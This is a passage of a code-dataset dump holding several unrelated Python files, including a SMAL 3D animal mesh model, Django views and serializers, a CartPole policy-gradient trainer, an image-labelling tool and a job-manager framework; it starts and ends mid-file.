self.size[0], self.size[1]]) + v_shaped\n        #J_transformed=(1,35,3) 3 elements?\n        #A=(1,35,4,4)\n        #4. Get the global joint location: with joint 0 as the root, the rotations of the other joints relative to it express the global rotation of the model\n        self.J_transformed, A = batch_global_rigid_transformation(\n            Rs, J, self.parents)#, betas_logscale=betas_logscale\n\n\n        # 5. Do skinning:\n        num_batch = theta.shape[0]\n        #(3889,35) skinning weights\n        weights_t = self.weights.repeat([num_batch, 1])\n        W = torch.reshape(weights_t, [num_batch, -1, 35])\n\n        #(1,3889,4,4)\n        T = torch.reshape(\n            torch.matmul(W, torch.reshape(A, [num_batch, 35, 16])), [num_batch, -1, 4, 4])\n        #(1,3889,4) append a column of ones\n        v_posed_homo = torch.cat(\n            [v_posed, torch.ones([num_batch, v_posed.shape[1], 1]).to(device=beta.device)], 2)\n        #(1,3889,4,1)\n        v_homo = torch.matmul(T, v_posed_homo.unsqueeze(-1))\n\n        verts = v_homo[:, :, :3, 0]\n\n        if trans is None:\n            trans = torch.zeros((num_batch,3)).to(device=beta.device)\n\n        verts = verts + trans[:, None, :]\n        # print(\"tran: \",trans)\n\n        # Get joints: joint locations after the transformation\n        # joint_x = torch.matmul(verts[:, :, 0], self.J_regressor)\n        # joint_y = torch.matmul(verts[:, :, 1], self.J_regressor)\n        # joint_z = torch.matmul(verts[:, :, 2], self.J_regressor)\n        # joints = torch.stack([joint_x, joint_y, joint_z], dim=2)\n        joints = self.J_transformed\n\n        joints = torch.cat([\n            joints,\n            verts[:, None, 257], # 35 nose\n            verts[:, None, 237], # 36 chin\n            verts[:, None, 3700], # 37 left ear tip\n            verts[:, None, 1820], # 38 right ear tip\n            verts[:, None, 3816], # 39 left eye\n            verts[:, None, 1936], # 40 right eye\n            verts[:, None, 321], # 41 throat\n        ], dim = 1) \n\n
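        # A minimal usage sketch of the forward pass above (hypothetical, commented out;\n        # the zero-valued beta/theta are placeholder inputs, shapes follow this class):\n        # smal = SMAL(device=torch.device('cpu'))\n        # beta = torch.zeros(1, smal.num_betas)   # (N, 41) shape coefficients\n        # theta = torch.zeros(1, 35, 3)           # (N, 35, 3) per-joint axis-angle, identity pose\n        # verts, joints, Rs, v_shaped = smal(beta, theta, get_skin=True)\n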
        # import matplotlib.pyplot as plt\n        # plt.ion()\n        # plt.figure(figsize=[10, 8])\n        # ax = plt.axes(projection=\"3d\")\n        # joints_x, joints_y, joints_z = joints.cpu()[0][:, 0].detach().numpy(), joints.cpu()[0][:, 1].detach().numpy(), joints.cpu()[0][:,2].detach().numpy()\n        # verts_x, verts_y, verts_z = v_template[:, 0].cpu().detach().numpy(), v_template[:, 1].cpu().detach().numpy(),v_template[:, 2].cpu().detach().numpy()\n        #\n        # # ax.scatter3D(joints_x, joints_y, joints_z, s=50, c='red', label='3d')\n        # ax.scatter3D(verts_x, verts_y, verts_z, s=10, c='blue', label='3d',alpha=0.5)\n        # for i, j in enumerate(config.PIG_MODEL_JOINTS_NAME):\n        #     ax.text3D(joints.cpu()[0][i][0].detach().numpy(), joints.cpu()[0][i][1].detach().numpy(),\n        #               joints.cpu()[0][i][2].detach().numpy(), j)\n        # # ax.scatter3D(proj_points[0][:, 0].detach().numpy(), proj_points[0][:, 1].detach().numpy(),\n        # # np.zeros_like(proj_points[0][:,0].detach().numpy()), s=50, c='blue', label='2d')\n        # ax.legend()\n        # # kintree_table = [[6, 7], [7, 8], [8, 11], [9, 10], [10, 11], [3, 4], [4, 5], [3, 4],\n        # #                  [0, 1], [1, 2], [2, 5], [2, 8], [2, 15],\n        # #                  [8, 16], [15, 19], [16, 20],\n        # #                  [16, 22], [15, 21], [21, 17], [22, 17], [18, 17],\n        # #                  [11, 12], [5, 12], [12, 13], [13, 14]]\n        # for i in self.kintree_table.T:\n        #     if i[0] > 35:\n        #         i=[0,0]\n        #     x1, y1, z1 = [], [], []\n        #     x2, y2, z2 = [], [], []\n        #     for j in i: # connect the two points\n        #         x1.append(float(joints_x[j]))\n        #         y1.append(float(joints_y[j]))\n        #         z1.append(float(joints_z[j]))\n        #         x2.append(float(Jx[0][j]))\n        #         y2.append(float(Jy[0][j]))\n        #         z2.append(float(Jz[0][j]))\n        #     ax.plot3D(x1, y1, z1, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10,\n        #               label=\"first\")\n        #     # ax.plot3D(x2, y2, z2, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10, label=\"second\")\n        #     ax.text3D(x1[0], y1[0], z1[0], \"3d\", fontsize=10)\n        #     # ax.text3D(x2[0], y2[0], z2[0], \"second\", fontsize=10)\n        # # plt.savefig(rf\"E:\\DL\\SMALify\\outputs\\pigs\\vis_joints\\{time.time()}.png\")\n        # # plt.close('all')\n        # plt.xlabel('X')\n        # plt.ylabel('Y') # rotate the y-axis label by 38 degrees\n        # ax.set_zlabel('Z', rotation=90) # plt cannot set the z-axis label, so it has to be set through ax here (the x- and y-axis labels can of course also be set through ax)\n        # import time\n        # time0 = time.time()\n        # # plt.savefig(f\"/media/scau2311/A/xcg/SMALify/outputs/pigs/000000054901/vis_results/3d_joint_{time0}.jpg\")\n        # plt.pause(10)\n        # plt.show()\n\n        if get_skin:\n            return verts, joints, Rs, v_shaped##\n        else:\n            return joints\n","repo_name":"G-Apple1/SMALify-Pig3D","sub_path":"smal_model/smal_torch.py","file_name":"smal_torch.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"22529547208","text":"from __future__ import absolute_import\nfrom typing import Tuple\nimport os\nimport json\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\nfrom castor.detector.suppressor.suppressor import SuppressorPipeline\nfrom castor.utils import logger as llogger\nfrom castor.utils import const as con\nfrom castor.detector.cache.cache import CacheSet\nfrom castor.detector.cache.organize_cache import clear_cache\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nTESTS_PATH = os.path.split(CURRENT_PATH)[0]\nCONF_PATH = os.path.join(\n    Path(__file__).parents[2], \"demo\", \"demo_conf\", \"detect_base.yaml\"\n)\nDATA_PATH = os.path.join(TESTS_PATH, \"data\")\nwith open(os.path.join(TESTS_PATH, \"conf\", \"test.json\")) as f:\n    tests_params = json.load(f)\nllogger.basic_config(level=\"DEBUG\")\n\nsuppress_module = [\"transient\", \"continuous\"]\nif_anomaly = [True, False]\n\nparams = {\n    \"transient\": {\n        \"cache_length\": 30,\n        \"TransientAnomalySuppressor\": {con.WINDOW: 5, \"anomalies\": 3},\n    },\n    \"continuous\": {\n        \"cache_length\": 30,\n        \"ContinuousAnomalySuppressor\": {con.GAP: \"10D\"},\n    },\n}\n\nresult = {\"transient\": {True: 1, False: 0}, \"continuous\": {True: 1, False: 0}}\n\n\ndef pandas_wrap(data: np.ndarray, data_type: str):\n    if data_type == \"detect_result\":\n        return pd.DataFrame(\n            data,\n            index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n            columns=[\"lacolumn\"],\n        )\n    elif data_type == \"ori_data\":\n        return pd.DataFrame(\n            data,\n            index=pd.date_range(start=\"2021-01-02\", 
periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n else:\n return None\n\n\ndef data_generation(\n module: str, status: bool, length: int\n) -> Tuple[pd.DataFrame, pd.DataFrame]:\n label = np.array([False] * length).reshape(-1, 1)\n ori_data = np.ones((length, 1))\n if module == \"transient\":\n label[50:60, 0] = True\n if status:\n label[62, 0] = True\n else:\n label[63, 0] = True\n elif module == \"continuous\":\n label[58, 0] = True\n if status:\n label[70, 0] = True\n else:\n label[63, 0] = True\n\n return pandas_wrap(ori_data, data_type=\"ori_data\"), pandas_wrap(\n label, data_type=\"detect_result\"\n )\n\n\n@pytest.mark.usefixtures(\"env_ready\")\nclass TestSuppressor:\n @pytest.fixture()\n def env_ready(self):\n self.tear_up()\n yield\n self.tear_down()\n\n def tear_up(self):\n pass\n\n def tear_down(self):\n clear_cache()\n\n @pytest.mark.parametrize(\"module\", suppress_module)\n @pytest.mark.parametrize(\"if_anomaly_bool\", if_anomaly)\n def test_suppress(self, module, if_anomaly_bool):\n suppressor_name = {\n \"transient\": \"TransientAnomalySuppressor\",\n \"continuous\": \"ContinuousAnomalySuppressor\",\n }\n cache_length = {\"transient\": 1, \"continuous\": 1}\n cache = CacheSet().get_cache(con.SUPPRESS_CACHE)\n data, detect_results = data_generation(module, if_anomaly_bool, 100)\n suppressor = SuppressorPipeline(name=\"Gemini\", params=params.get(module))\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[:30, :], con.ORIGIN: data.iloc[:30, :]}\n )\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[30:60, :], con.ORIGIN: data.iloc[30:60, :]}\n )\n print(f'result: {\"Gemini\" + suppressor_name.get(module) + \"lacolumn\"}')\n\n cache_result = [col for col in cache.keys() if str(col).startswith(\"Gemini\")]\n assert len(cache_result) == cache_length.get(module)\n detect_results = suppressor.suppress(\n {con.LABEL: detect_results.iloc[60:, :], con.ORIGIN: data.iloc[60:, :]}\n )\n print(f\"detect_result: {detect_results}\")\n print(f\"SuppressCache: {CacheSet().get_cache(con.SUPPRESS_CACHE)._cache}\")\n assert sum(detect_results.get(con.LABEL).iloc[:, 0]) == result.get(module).get(\n if_anomaly_bool\n )\n","repo_name":"openGemini/openGemini-castor","sub_path":"tests/suppressor/test_suppressor_cache.py","file_name":"test_suppressor_cache.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"36"} +{"seq_id":"38915897410","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UserCreationForm,editarperrfilform\n\ndef registro(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = UserCreationForm()\n return render(request,'registration/registro.html',{'form':form})\n\n@login_required\ndef editarperfil(request):\n user = request.user\n if request.method == 'POST':\n form = editarperrfilform(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = editarperrfilform(instance=user)\n return render(request, 'registration/editar_perfil.html', {'form': form})\n","repo_name":"zk-error/myshop","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} 
+{"seq_id":"20885255117","text":"import sys, json, re, os\nHOME=os.path.expanduser(\"~\")\nsys.path.append(os.path.join(HOME, 'lmfdb'))\n\nfh=open(\"grdata.out\")\nfrom lmfdb import db\n\nadict = {}\n\nadictaut = {}\n\nfor fn in [\"grdata.out\", \"grdata_aut.out\"]:\n print (\"Reading \"+fn)\n fh=open(fn)\n for line in fh.readlines():\n line.strip()\n if re.match(r'\\S', line):\n line = line.replace(r\"'\", r'\"')\n l = json.loads(line)\n ambient = l[0]\n final=l[1]\n for a in final:\n full_label = \"%s.%s\"%(ambient, a[0])\n if fn == \"grdata.out\":\n adict[full_label] = int(round(a[1]))\n else:\n adictaut[full_label] = int(round(a[1]))\n #print ({'label': '%s.%s'%(lab, a[0])}, {'diagram_x': a[1]})\n #db.gps_subgroups.upsert({'label': '%s'%(a[0])}, {'diagram_x': int(round(a[1]))})\n fh.close()\n\n\n#for a in final:\n# db.gps_subgroups.upsert({'label': '%s.%s'%(gp, a[0])}, {'diagram_x': a[1]})\n\ndef modif(ent):\n global adict\n lab = ent['label']\n if lab in adict:\n ent['diagram_x'] = adict[lab]\n if lab in adictaut:\n ent['diagram_aut_x'] = adictaut[lab]\n return ent\n\ndb.gps_subgroups.rewrite(modif)\n\n","repo_name":"roed314/FiniteGroups","sub_path":"Code/LMFDB/grfinish.py","file_name":"grfinish.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"13271035173","text":"from rest_framework import serializers\nfrom snippets.models import Snippet, CourseList, CoursePage\nfrom django.contrib.auth.models import User, Group\nfrom django.core.mail import send_mail\nfrom tutorial.settings import BASE_URL\nfrom utils.token_generator import token_generator, create_email_confirm_url\n\n# class SnippetSerializer(serializers.ModelSerializer):\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n class Meta:\n model = Snippet\n # fields = ('id', 'title', 'code', 'linenos', 'language', 'style', 'owner')\n fields = ('url', 'id', 'title', 'owner')\n\n\nclass CreateSnippetSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n\n class Meta:\n model = Snippet\n fields = (\n 'url', 'id', 'title', 'code', 'linenos', 'language',\n 'style', 'owner', 'perm_list'\n )\n\n\n# class UserSerializer(serializers.ModelSerializer):\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n # snippets = serializers.PrimaryKeyRelatedField(many=True, queryset=Snippet.objects.all())\n snippets = serializers.HyperlinkedRelatedField(\n many=True, view_name='snippet-detail',\n read_only=True\n )\n\n class Meta:\n model = User\n fields = ('id', 'username', 'snippets')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n is_active = False,\n email = validated_data['email']\n )\n print('SOMEPRINT',validated_data)\n print('SOMEPRINT')\n token = token_generator.make_token(user)\n url = create_email_confirm_url(user.id, token)\n print('SOMEPRINT', url)\n # ~ send_mail(\n # ~ 'Activation on Django', url, 'djangodev108@gmail.com',\n # ~ [validated_data['email']], fail_silently=False\n # ~ )\n user.set_password(validated_data['password'])\n user.groups.add(1)\n user.save()\n if 
User.objects.filter(username=self.validated_data['username']).exists():\n send_mail(\n 'Activation on Django', url, 'djangodev108@gmail.com',\n [validated_data['email']], fail_silently=False\n )\n else:\n print('SOMEPRINT wrong')\n return user\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'password', 'email', 'first_name',\n 'last_name',\n )\n\n\nclass CreateCourseSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'owner')\n\n\nclass CreateCoursePageSerializer(serializers.ModelSerializer):\n class Meta:\n model = CoursePage\n fields = ('course', 'snippet', 'order', 'dtm')\n\n\nclass CourseListSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = CourseList\n fields = ('url', 'id', 'title', 'descrpt', 'owner')\n\n\nclass CoursePageSerializer(serializers.HyperlinkedModelSerializer):\n # snippet = serializers.HyperlinkedRelatedField(many=False, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n class Meta:\n model = CoursePage\n fields = ('order', 'title', 'dtm','snippet')\n\n\nclass CourseDetailSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.StringRelatedField(many=True)\n # pages_listing = serializers.HyperlinkedIdentityField(view_name='coursepage-list')\n pages = CoursePageSerializer(many=True, read_only=True)\n # ~ pages = serializers.HyperlinkedRelatedField(\n # ~ many=True,\n # ~ view_name='coursepage-detail',\n # ~ read_only=True\n # ~ )\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'pages')\n\n\nclass CourseDetailPageSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n\n class Meta:\n model = CoursePage\nfields = ('title', 'order', 'dtm', 'snippet')\n","repo_name":"Serq108/DZ10","sub_path":"snippets/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28072424022","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lesson', '0001_initial'),\n ('word', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('lesson_user', models.ForeignKey(related_name='exam', to='lesson.LessonUser')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='exam',\n field=models.ForeignKey(related_name='answer', to='exam.Exam'),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', to='word.Question'),\n ),\n 
]\n","repo_name":"huyquyet/projectLearn","sub_path":"exam/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35815255363","text":"import torch\nimport math\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom agents.policy_gradient import PGAgent\nimport gymnasium as gym\n\ndef visualize_in_gym(agent, env_name = \"\", inp_env = None, steps=100):\n \"\"\"\n render a environment and visualize it running N steps\n\n another possible solution can be gymnasium.experimental.wrappers.RecordVideoV0\n\n or gymnasium.utils.save_video.save_video?\n \"\"\"\n if inp_env:\n demo_env = inp_env\n else:\n demo_env = gym.make(env_name, render_mode = \"human\")\n observation, info = demo_env.reset()\n\n for _ in range(steps):\n action = agent.get_action(torch.from_numpy(observation)) # agent policy that uses the observation and info\n # insert an algorithm that can interact with env and output an action here\n observation, reward, terminated, truncated, _ = demo_env.step(action)\n if terminated or truncated:\n observation, info = demo_env.reset()\n\n if not inp_env:\n demo_env.close()\n\nenv = gym.make(\"CartPole-v1\")\n\nagent = PGAgent(4, 2)\n\ndemo_env = gym.make(\"CartPole-v1\", render_mode = \"human\")\n# gym.utils.play.play(demo_env, fps=128)\n\nwriter = SummaryWriter()\n\nDISCOUNTED_FACTOR = 0.9\n\nnum_episodes = 2000\nfor episode in range(num_episodes):\n episode_recorder = []\n observation, info = env.reset()\n done = False\n episode_reward = 0\n while not done:\n action = agent.get_action(torch.from_numpy(observation))\n next_observation, reward, terminated, truncated, _ = env.step(action)\n episode_recorder.append((observation, action, reward, next_observation))\n observation = next_observation\n done = terminated or truncated\n episode_reward += reward\n\n # for observation, action, reward, next_observation in reversed(episode_recorder):\n loss = agent.update(episode_recorder, DISCOUNTED_FACTOR)\n\n writer.add_scalar('Loss', loss, episode)\n writer.add_scalar('Reward', episode_reward, episode)\n if episode % 100 == 0:\n visualize_in_gym(agent, inp_env=demo_env)\n # visualize_in_gym(agent, env_name=\"CartPole-v1\")\n\n\nwriter.flush()\nwriter.close()\n\n\nvisualize_in_gym(agent, inp_env=demo_env)","repo_name":"zhilu1/rl_practice","sub_path":"cart_pole_PG.py","file_name":"cart_pole_PG.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15907813457","text":"#!/usr/bin/env python3\nimport os\nimport pygame\nimport sys\nimport glob\nfrom window import Window\nimport numpy as np\nsys.path.append(os.getcwd())\nfrom viewer import fix\nfrom tqdm import tqdm\nfrom PIL import Image\n\n# to generate:\n# grep -vIr \"\\x00\" -- */*/ent.txt > /tmp/ents\n# cat /tmp/ents | sort -t \":\" -k2 -n -r > /tmp/entssort\n\nBASEDIR = sys.argv[1]\n\nwin = Window(1164, 874)\ncc = 0\n\nif len(sys.argv) > 3:\n mask = sys.argv[3]\nelse:\n mask = \"h%03d\"\n\nwhile len(glob.glob((\"imgs/\"+mask+\"*\") % cc)) > 0:\n cc += 1\nprint(\"starting with %d\" % cc)\n\nseen = set([x.split(\"_\", 1)[1] for x in glob.glob(\"imgs/*\")])\n\n# permanent camera occulusions\nEXCLUDE_USERS = [\"807f77aac0daa4b6\", \"84e6a31bffe59bee\"]\n\nseek_fn = None\n#seek_fn = glob.glob(\"imgs/\"+(mask % (cc-1))+\"*\")[0].split(\"_\", 1)[1]\n#print(seek_fn)\n\no = 2\ndat = 
open(sys.argv[2]).read().strip().split(\"\\n\")\nfor d in tqdm(dat):\n fn = os.path.join(BASEDIR, d.split(\":\")[0].replace(\"/ent.txt\", \"\"))\n dd = sorted(os.listdir(fn))\n if seek_fn is not None:\n #print(dd[1], seek_fn)\n if not dd[1].endswith(seek_fn):\n continue\n seek_fn = None\n\n if dd[1][5:] in seen:\n continue\n if dd[1].split(\"_\")[1] in EXCLUDE_USERS:\n continue\n print(dd)\n\n ii = np.array(Image.open(os.path.join(fn, dd[1])))\n segi = fix(Image.open(os.path.join(fn, dd[2])))\n while 1:\n pii = ii*((10-o)/10) + segi*(o/10)\n win.draw(pii)\n kk = win.getkey()\n if kk == ord(\"z\"):\n suf = dd[1][5:]\n outn = (\"imgs/\"+mask+\"_%s\") % (cc, suf)\n print(\"saving \", outn)\n im = Image.fromarray(ii)\n im.save(outn)\n im = Image.fromarray(segi)\n im.save(outn.replace(\"imgs/\", \"masks/\"))\n cc += 1\n break\n elif kk == pygame.locals.K_UP:\n o = min(10, o+1)\n elif kk == pygame.locals.K_DOWN:\n o = max(0, o-1)\n elif kk == ord(\" \"):\n break\n\n\n\n","repo_name":"commaai/comma10k","sub_path":"tools/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"36"} +{"seq_id":"1915200176","text":"import numpy as np\nimport pandas as pd \n\n\"\"\"\n Every one of these functions expects a full interval df (so zero and NaN intervals) \n but will only give a predictions for the zero intervals \n\"\"\"\n\ndef sign_change_intervals(interval_df):\n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n sign_change_intervals = np.sign(short_zero_intervals['value_before_start']) == - np.sign(short_zero_intervals['0th_value_after_end'])\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with a sign change is normal\n result.loc[sign_change_intervals[sign_change_intervals].index] = False\n \n return result\n \n \ndef low_consumption_on_both_sides_intervals(interval_df): \n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n low_consumption = (np.abs(short_zero_intervals['value_before_start']) < 0.1) & (np.abs(short_zero_intervals['0th_value_after_end']) < 0.1)\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with low consumption on both sides is normal\n result.loc[low_consumption[low_consumption].index] = False\n \n return result\n\ndef collective_error_intervals(interval_df, threshold = 2): \n # count how much each start time occurs\n interval_counts = interval_df.reset_index().groupby('start')[['meterID', 'year']].size()\n # add this to the interval df as a column\n intervals_with_count = interval_df.join(interval_counts.to_frame('count'), on = ['start'])\n\n # only use the intervals with a very high count\n intervals_with_count = intervals_with_count[intervals_with_count['count'] >= 33] \n\n # filter each group of intervals that start on the same moment, only allow intervals with the most common length +- a threshold (in this case 2)\n def filter_groups(df): \n most_common_value = df.interval_length.value_counts().idxmax()\n return df[(df.interval_length >= most_common_value -threshold) & 
(df.interval_length <= most_common_value + threshold) ]\n intervals_with_count = intervals_with_count.groupby('start_time').apply(filter_groups).droplevel(0)\n \n # each of the intervals that remains is thus a collective data problem and is a data error\n collective_data_problems = pd.Series(index = interval_df.index, dtype = 'object')\n collective_data_problems.loc[intervals_with_count.index] = True\n return collective_data_problems\n ","repo_name":"jankrans/Conditional-Generative-Neural-Networks","sub_path":"repositories/profile-clustering/notebooks/real_data_exploration/handling_zeros_and_nans/zero_intervals.py","file_name":"zero_intervals.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30199883148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\"\"\"\n(c) 2015 Ronan Delacroix\nJob Manager Job Abstract Class\n:author: Ronan Delacroix\n\"\"\"\nimport os\nimport logging\nimport mongoengine\nimport mongoengine.signals\nimport tbx\nimport tbx.process\nimport tbx.service\nimport tbx.log\nimport tbx.text\nimport uuid as UUID\nimport traceback\nimport tempfile\nimport shutil\nfrom datetime import datetime, timedelta\nimport jobmanager.common as common\nfrom .host import Host\nfrom tbx.code import cached_property\n\n\njob_status_to_icon = {\n 'new': \"\\u23F8\",\n 'pending': \"\\u23F8\",\n 'running': \"\\u25B6\",\n 'success': \"\\u2605\",\n 'error': \"\\u2716\"\n}\n\n\nclass Job(common.NamedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n\n meta = {\n 'collection': 'jobs',\n 'indexes': [\n 'status',\n 'created',\n ]\n }\n\n status_text = mongoengine.StringField(required=True, default=\"\")\n hostname = mongoengine.StringField()\n completion = mongoengine.IntField(required=True, min_value=0, max_value=100, default=0)\n timeout = mongoengine.IntField(min_value=0, default=43200) # 12 hours\n ttl = mongoengine.IntField(min_value=1, default=1)\n history = mongoengine.ListField(field=mongoengine.DictField(), default=[])\n\n def __str__(self):\n return \"%s %s\" % (self.name, job_status_to_icon.get(self.status, self.status))\n\n @classmethod\n def default_slot_amount(cls):\n \"\"\"\n Returns the default amount of job that can be run at the same time on the same machine/client.\n Override and set to math.inf for no limiting amount.\n You can base that how much CPU cores you have or anything else.\n Default is 1 job at a time by default.\n \"\"\"\n return 1\n\n @cached_property\n def extra_log_arguments(self):\n return {\n 'job_type': self.__class__.__name__,\n 'job_uuid': self.uuid,\n 'job_status': self.status,\n }\n\n def update_status(self, completion=None, text=None):\n if text:\n self.status_text = text\n\n if completion:\n self.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.completion,\n message=self.status_text\n ))\n\n self.update(\n add_to_set__history={'t': datetime.utcnow(), 'm': self.status_text, 'c': self.completion, 's': self.status},\n status=self.status,\n details=self.details,\n completion=self.completion,\n status_text=self.status_text,\n started=self.started,\n finished=self.finished\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n def save_as_successful(self, text=\"Job Successful\"):\n self.update_status(100, 
text=text)\n self.save() # Saves all other fields\n\n def save_as_error(self, text=\"Job Error\"):\n self.status = 'error'\n self.update_status(text=text)\n self.save()\n\n\nmongoengine.signals.pre_save.connect(common.update_modified)\n\n\nclass JobTask(mongoengine.EmbeddedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n meta = {\n 'abstract': True,\n }\n\n status = mongoengine.StringField(required=True, default=\"pending\",\n choices=('new', 'pending', 'running', 'success', 'error'))\n details = mongoengine.StringField(required=False)\n\n @property\n def job(self):\n if isinstance(self._instance, JobTask):\n return self._instance.job\n return self._instance\n\n @cached_property\n def extra_log_arguments(self):\n extra_log_arguments = {}\n if isinstance(self.job, common.LogProxy):\n extra_log_arguments = self.job.extra_log_arguments\n extra_log_arguments['task'] = self.name\n return extra_log_arguments\n\n def __str__(self):\n return \"%s > %s\" % (self.job, self.name)\n\n def get_hash(self):\n import base64\n import hashlib\n return base64.b64encode(\n hashlib.sha1(mongoengine.EmbeddedDocument.to_json(self, sort_keys=True).encode()).digest()).decode().strip('=').replace(\"+\", \"-\")\n\n def update_status(self, completion=None, text=None):\n # TODO : Review this part // Completion between tasks and jobs is not clear.\n if text:\n self.job.status_text = text\n\n if completion:\n self.job.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.job.completion,\n message=text\n ))\n\n self.job.update(\n add_to_set__history={'t': datetime.utcnow(), 'k': self.name, 'm': text, 'c': completion},\n completion=completion,\n status_text=text\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n\ndef make_job(job_name, **kwargs):\n \"\"\"\n Decorator to create a Job from a function.\n Give a job name and add extra fields to the job.\n\n @make_job(\"ExecuteDecJob\",\n command=mongoengine.StringField(required=True),\n output=mongoengine.StringField(default=None))\n def execute(job: Job):\n job.log_info('ExecuteJob %s - Executing command...' 
% job.uuid)\n result = subprocess.run(job.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n job.output = result.stdout.decode('utf-8') + \" \" + result.stderr.decode('utf-8')\n\n \"\"\"\n def wraps(func):\n kwargs['process'] = func\n job = type(job_name, (Job,), kwargs)\n globals()[job_name] = job\n return job\n return wraps\n","repo_name":"ronhanson/python-jobmanager-common","sub_path":"jobmanager/common/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23702290276","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n__all__ = [\"GPLikelihood\"]\n\nimport numpy as np\n\ntry:\n import george\nexcept ImportError:\n george = None\nelse:\n from george.kernels import Matern32Kernel\n\nfrom ..pipeline import Pipeline\nfrom ..gp_heuristics import estimate_tau\n\n\nclass GPLikelihood(Pipeline):\n\n query_parameters = dict(\n tau_frac=(0.25, False),\n )\n\n def __init__(self, 